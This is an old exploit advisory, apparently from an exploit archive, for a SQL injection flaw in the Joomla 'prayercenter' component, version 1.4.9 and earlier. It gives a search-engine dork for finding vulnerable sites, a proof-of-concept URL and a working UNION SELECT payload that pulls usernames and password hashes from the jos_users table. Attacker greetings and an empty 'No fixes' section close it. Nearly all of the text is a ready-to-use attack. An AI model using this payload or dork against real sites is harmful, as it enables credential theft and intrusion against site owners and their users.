Joomla Component prayercenter <= 1.4.9 (id) SQL Injection Vulnerability

2008-05-31 00:00:00

/---------------------------------------------------------------\
\ /
/ Joomla Component prayercenter Remote SQL injection \
\ /
\---------------------------------------------------------------/


[*] Author : His0k4 [ALGERIAN HaCkEr]

[*] Dork : inurl:"com_prayercenter"

[*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}

[*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

[*] Note : Sometimes you need to register for doing this exploit

----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
[*] Greetings2 : http://www.palcastle.org/cc

#

Fixes

No fixes

In order to submit a new fix you need to be registered.